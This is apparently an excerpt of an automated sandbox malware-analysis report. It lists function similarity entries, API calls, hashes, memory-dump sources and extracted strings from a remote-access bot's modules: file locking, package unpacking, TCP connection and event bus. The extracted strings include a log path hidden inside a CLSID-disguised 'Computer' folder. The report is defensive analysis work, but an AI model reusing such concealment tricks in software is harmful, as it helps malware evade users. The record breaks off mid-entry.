                                    • Opcode Fuzzy Hash: 40dbb72f32e1da1f63c3337725ccdb864fd4bb97a0da6b954f206b1e6fe925d8
                                    • Instruction Fuzzy Hash: 9F716BA1E0C6C386FB265B35EE40BB96250AB4F744F941132DA0EC66F5DEADEC45C701
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CreateDirectoryErrorLast$strcpy
                                    • String ID: (path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,gle=%lu)$[E] (%s) -> CreateDirectoryA failed(path=%s,recursive=%d,ptr=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,recursive=%d,err=%08x)$[I] (%s) -> Done(path=%s,recursive=%d)$fs_dir_create
                                    • API String ID: 1104438493-1059260517
                                    • Opcode ID: 3c9f990b9a47e33ded08a4b529be2ee697f664180362654706160e751e935eaf
                                    • Instruction ID: 08f258ce8120e84896defbeec13d85be31fe868c10dae2c316312135c259a75a
                                    • Opcode Fuzzy Hash: 3c9f990b9a47e33ded08a4b529be2ee697f664180362654706160e751e935eaf
                                    • Instruction Fuzzy Hash: E1718CA9E1C6C386FAA35F35ECCC3BD1241AF85784F5C01B2D9CE6A695DE2CE9458301
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: strlen$CountCriticalErrorHandleInitializeLastModuleSectionSpin_mbscatfopen
                                    • String ID: C:\Users\Public\Computer.{20d04fe0-3aea-1069-a2d8-08002b30309d}\main.log$Done$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(log_cs) failed(gle=%lu)$[E] (%s) -> Log open failed(flog_path=%s)$[I] (%s) -> %s$[I] (%s) -> Log open success(flog_path=%s)$debug_init$main.log$service
                                    • API String ID: 3216678114-1460613360
                                    • Opcode ID: 9f6c490a9cfb74d6111be8015f030a036cecc235e5153bbe8b37ae26b207c3b2
                                    • Instruction ID: 94ef096408764df8a1db390255f0454dd73512f014b66943fcf2aa018127524b
                                    • Opcode Fuzzy Hash: 9f6c490a9cfb74d6111be8015f030a036cecc235e5153bbe8b37ae26b207c3b2
                                    • Instruction Fuzzy Hash: 2C515B20E0FA03C2FB60B755A8803B8E6A0AF14744FDA44B6D90D462F2DF6DB9479371
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: strlen$_errno_mbscpy$_mbscatfopenfseek
                                    • String ID: %TEMP%$(package != NULL)$(target != NULL)$C:/Projects/rdp/bot/codebase/package.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> Entry unpack failed(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u,err=%08x)$[E] (%s) -> Failed(package=%s,target=%s,err=%08x)$[I] (%s) -> Done(package=%s,target=%s)$[I] (%s) -> Entry unpack done(package=%s,target=%s,pkg_ent=%s,pkg_ent_sz=%u)$package_unpack
                                    • API String ID: 3066828623-21863935
                                    • Opcode ID: 96d0877263f05c76138a00ab05bbbce443a058112770a0b49e927ae3a5d30d82
                                    • Instruction ID: deba06994c7a2683c8a0cbd73cfa94a5551c392010da3f18bd95f8c5d21ac18c
                                    • Opcode Fuzzy Hash: 96d0877263f05c76138a00ab05bbbce443a058112770a0b49e927ae3a5d30d82
                                    • Instruction Fuzzy Hash: F781AE21A0B783D6FA20AB15E8403F9E760EB54384FC64172EA4D876A5DF7CE54BC720
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: strlen$Heap_mbscpy$AllocFreeHandleLibraryModuleProcess
                                    • String ID: [E] (%s) -> Failed(name=%s,err=%08x)$[E] (%s) -> Memory allocation failed(size=%llu)$[I] (%s) -> Done(name=%s)$[I] (%s) -> Loaded(f_path=%s)$mem_alloc$unit_cleanup$unit_init$units_init
                                    • API String ID: 548194777-214984806
                                    • Opcode ID: 49a6f995f23c10737c65cbd86f82c3dad5bdca8e7ab1c08c2037f680bee562b4
                                    • Instruction ID: f5efd424e764a61e6ada6c456d8cf780977b79b4f388a1f91f14d135e4ad7cd0
                                    • Opcode Fuzzy Hash: 49a6f995f23c10737c65cbd86f82c3dad5bdca8e7ab1c08c2037f680bee562b4
                                    • Instruction Fuzzy Hash: 8A816C25A0B643C6FA65BB11E8503B9E2A1AF54784FC640B5DA4D177B6EF3CE907C320
                                    APIs
                                    • CreateFileA.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000027B435613D0,?,00007FF7AABE8500,00007FF7AABD1669), ref: 00007FF7AABD68B7
                                    • LockFileEx.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000027B435613D0,?,00007FF7AABE8500,00007FF7AABD1669), ref: 00007FF7AABD68F0
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000027B435613D0,?,00007FF7AABE8500,00007FF7AABD1669), ref: 00007FF7AABD69C5
                                    • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000027B435613D0,?,00007FF7AABE8500,00007FF7AABD1669), ref: 00007FF7AABD6AAA
                                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,service,0000027B435613D0,?,00007FF7AABE8500,00007FF7AABD1669), ref: 00007FF7AABD6C1E
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2206844500.00007FF7AABD1000.00000020.00000001.01000000.00000008.sdmp, Offset: 00007FF7AABD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2206820722.00007FF7AABD0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206867245.00007FF7AABE0000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABE8000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206894106.00007FF7AABEA000.00000004.00000001.01000000.00000008.sdmpDownload File
                                    • Associated: 0000001D.00000002.2206941983.00007FF7AABEE000.00000002.00000001.01000000.00000008.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ff7aabd0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorFileLast$CloseCreateHandleLock
                                    • String ID: (lock != NULL)$(path != NULL)$C:/Projects/rdp/bot/codebase/fs.c$NULL$[E] (%s) -> Assertation failed: %s, file %s, line %d$[E] (%s) -> CreateFileA failed(path=%s,gle=%lu)$[E] (%s) -> Failed(path=%s,err=%08x)$[E] (%s) -> LockFileEx failed(path=%s,gle=%lu)$[I] (%s) -> Done(path=%s,lock=%p)$fs_file_lock$service
                                    • API String ID: 2747014929-2960251455
                                    • Opcode ID: 32bd279c4891f4501be222e0aefa1aba61fbc0454ca9bf554f3c01b8b2a6a36b
                                    • Instruction ID: 5bc5fd076345b0c2c124303ef7f8ea86cca89d51a894b9db0911d0d1ebe3afba
                                    • Opcode Fuzzy Hash: 32bd279c4891f4501be222e0aefa1aba61fbc0454ca9bf554f3c01b8b2a6a36b
                                    • Instruction Fuzzy Hash: CF814260E1F74BC1FF30B714A860378F2509F24354ED642B2C96E066F1EE6DA9879362
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                    • API String ID: 3154682637-708158336
                                    • Opcode ID: 7b9621f55b462a4df11d70440d7af977b994da88e749484e5a4fd3ece3504c79
                                    • Instruction ID: eb3dedf4e65fa015ccdf64cae89b006b1c47b3840766b48d029959a849ab583f
                                    • Opcode Fuzzy Hash: 7b9621f55b462a4df11d70440d7af977b994da88e749484e5a4fd3ece3504c79
                                    • Instruction Fuzzy Hash: 88516DA1B0C68242FA229F35EC012B97660EF467A4F142335E96DC66F5DEFDED458302
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                    • API String ID: 3154682637-708158336
                                    • Opcode ID: 42a513e086be3f7698c7ad89dfea67c9f575b11d0ffa4fb26410aead9fb3811b
                                    • Instruction ID: 35476062a9f765074373a6c927b690775f38c6b04b67677873aaed90cb652e2a
                                    • Opcode Fuzzy Hash: 42a513e086be3f7698c7ad89dfea67c9f575b11d0ffa4fb26410aead9fb3811b
                                    • Instruction Fuzzy Hash: 0351B1A1E0C6C281F6665B35ED016BA6690AF9B764F140336DA2DC66F5DEFCEC058700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                    • API String ID: 3154682637-708158336
                                    • Opcode ID: 4a570b42710865c4136e5dc3a6bcffcdfce0b7aa7f59f7a588588a3db532e0b7
                                    • Instruction ID: 75b2c36892840c797f9b8c4c8c9f47bdb31ae7da8526ce59167dfa1a3f070c75
                                    • Opcode Fuzzy Hash: 4a570b42710865c4136e5dc3a6bcffcdfce0b7aa7f59f7a588588a3db532e0b7
                                    • Instruction Fuzzy Hash: F051D3EDB086C241E6265F35EC883BD6260AF857A4F0C03B5E8ED67AD5DE3DE5068700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                    • API String ID: 3154682637-708158336
                                    • Opcode ID: e9924cd01d0b3c7409d57820aa6eabcd1aae7b06c3348024cda31dcf4ca35cf1
                                    • Instruction ID: 0e9ac716c991865786f07d6d09f029ebb017b7d7862f2cb8d26eae146a5b70f2
                                    • Opcode Fuzzy Hash: e9924cd01d0b3c7409d57820aa6eabcd1aae7b06c3348024cda31dcf4ca35cf1
                                    • Instruction Fuzzy Hash: C751AFE1A0C6D242FA265B35EC4027A6650BF96764F140335D96EC76F9EEECEE0D8700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$setsockopt$connecthtonlhtonsioctlsocketselectsocket
                                    • String ID: [E] (%s) -> connect failed(sock=0x%llx,host=%08x,port=%u,WSAgle=%d)$[E] (%s) -> connection failed(host=%08x,port=%u)$[E] (%s) -> select failed(sock=0x%llx,WSAgle=%d)$[E] (%s) -> socket failed(host=%08x,port=%u,WSAgle=%d)$[I] (%s) -> Done(sock=0x%llx,host=%08x,port=%u)$[W] (%s) -> select timedout(sock=0x%llx,timeo=%u)$tcp_connect
                                    • API String ID: 3154682637-708158336
                                    • Opcode ID: 63e9ccf66588e02df8245d8e493e55658e32edb908cd34c0fc6374329a6fcae3
                                    • Instruction ID: fcf3a49a34557c6644b43841f8114cb1e2928e991ac5c85a6ea44e9739b9301c
                                    • Opcode Fuzzy Hash: 63e9ccf66588e02df8245d8e493e55658e32edb908cd34c0fc6374329a6fcae3
                                    • Instruction Fuzzy Hash: 3E51E9E1B0C6C681FA669B39EC0427D7690EF47B64F5C03B5D82D66AD4DE7CE5068700
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208550084.00007FFB22731000.00000020.00000001.01000000.0000000E.sdmp, Offset: 00007FFB22730000, based on PE: true
                                    • Associated: 0000001D.00000002.2208524670.00007FFB22730000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208579475.00007FFB22746000.00000002.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208602997.00007FFB22750000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208629839.00007FFB22753000.00000004.00000001.01000000.0000000E.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208653105.00007FFB22754000.00000008.00000001.01000000.0000000E.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22730000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                    • API String ID: 1412730629-3633878399
                                    • Opcode ID: 37134f807da23900acccd715bd19fcc5632abb98499871664f25fd8b4a17b3f6
                                    • Instruction ID: 61f4115b9f2703944623722725c6c005a981bb1e8ef75437f1351c2db10161f6
                                    • Opcode Fuzzy Hash: 37134f807da23900acccd715bd19fcc5632abb98499871664f25fd8b4a17b3f6
                                    • Instruction Fuzzy Hash: 3651D9E4F0C68382FB734B34DC963B922509B16325F544236C5AE862F19EDE6D86D287
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208703505.00007FFB22761000.00000020.00000001.01000000.0000000D.sdmp, Offset: 00007FFB22760000, based on PE: true
                                    • Associated: 0000001D.00000002.2208680037.00007FFB22760000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208733335.00007FFB22773000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208757421.00007FFB2277C000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208788193.00007FFB2277F000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208811315.00007FFB22780000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22760000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                    • API String ID: 1412730629-3633878399
                                    • Opcode ID: 757770ca1de49ac790da81443b3dcfdead16b8c2d60ba284c8a3f9fc14969c1f
                                    • Instruction ID: c5366bfd14612bc3c0ac13dc0aa3a5109ff4f0d7c6fd124a2629807bf9816c15
                                    • Opcode Fuzzy Hash: 757770ca1de49ac790da81443b3dcfdead16b8c2d60ba284c8a3f9fc14969c1f
                                    • Instruction Fuzzy Hash: C751C7A0E0C7C382F6625734EE893782250AB1B365F244736C56EC63F1DEEEAD858355
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209181785.00007FFB23B01000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FFB23B00000, based on PE: true
                                    • Associated: 0000001D.00000002.2209162006.00007FFB23B00000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209208855.00007FFB23B13000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209231667.00007FFB23B14000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209254886.00007FFB23B1D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209280482.00007FFB23B20000.00000004.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209306282.00007FFB23B21000.00000008.00000001.01000000.00000009.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209326411.00007FFB23B24000.00000002.00000001.01000000.00000009.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23b00000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                    • API String ID: 1412730629-3633878399
                                    • Opcode ID: ef59d220299792993e2acb5900f029ddfc2e5e1dfdde3bc2bfbb754bd10fac16
                                    • Instruction ID: b7ad97d3ef5837236ae7f244a13453ccad31674bb9b79cf07e1b77924aa88e2d
                                    • Opcode Fuzzy Hash: ef59d220299792993e2acb5900f029ddfc2e5e1dfdde3bc2bfbb754bd10fac16
                                    • Instruction Fuzzy Hash: 3051D8E8E0CAA781FA264F74EDCC37C1250DF05364E1C43B6C9EE262E5DE6DA9858341
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2208390764.00007FFB22701000.00000020.00000001.01000000.00000010.sdmp, Offset: 00007FFB22700000, based on PE: true
                                    • Associated: 0000001D.00000002.2208361583.00007FFB22700000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208422394.00007FFB22714000.00000002.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208448902.00007FFB2271D000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208474915.00007FFB22720000.00000004.00000001.01000000.00000010.sdmpDownload File
                                    • Associated: 0000001D.00000002.2208502995.00007FFB22721000.00000008.00000001.01000000.00000010.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb22700000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                    • API String ID: 1412730629-3633878399
                                    • Opcode ID: 1349c7ec8fcd76a7de27cf9f5af4e28e56b4df2844306dffd2769c088d887277
                                    • Instruction ID: 40729063ddce983ac1fdca23e6a80e17d84d66ba8fd6008e0e4ea0d289dc6bfe
                                    • Opcode Fuzzy Hash: 1349c7ec8fcd76a7de27cf9f5af4e28e56b4df2844306dffd2769c088d887277
                                    • Instruction Fuzzy Hash: 4451B9E0E0C6C381FA2A8B74EC9537812509F06374F244336C56E862F1AEDDAE899359
                                    APIs
                                    Strings
                                    Memory Dump Source
                                    • Source File: 0000001D.00000002.2209018844.00007FFB23AD1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FFB23AD0000, based on PE: true
                                    • Associated: 0000001D.00000002.2208997687.00007FFB23AD0000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209048151.00007FFB23AE2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209071254.00007FFB23AEB000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209098898.00007FFB23AEE000.00000004.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209118852.00007FFB23AEF000.00000008.00000001.01000000.0000000A.sdmpDownload File
                                    • Associated: 0000001D.00000002.2209139881.00007FFB23AF2000.00000002.00000001.01000000.0000000A.sdmpDownload File
                                    Joe Sandbox IDA Plugin
                                    • Snapshot File: hcaresult_29_2_7ffb23ad0000_main.jbxd
                                    Similarity
                                    • API ID: ErrorLast$CountCreateCriticalInitializeSectionSpinThreadfflushfwrite
                                    • String ID: $ $Done$P$P$[E] (%s) -> CreateThread(routine_rx) failed(gle=%lu)$[E] (%s) -> Failed(err=%08x)$[E] (%s) -> InitializeCriticalSectionAndSpinCount(cs_subscribers) failed(gle=%lu)$[I] (%s) -> %s$ebus_init$~$~
                                    • API String ID: 1412730629-3633878399
                                    • Opcode ID: 2f0353d3db8fb330f785c6b32531c3accab744cb25dd3148899e22b66600bbd7
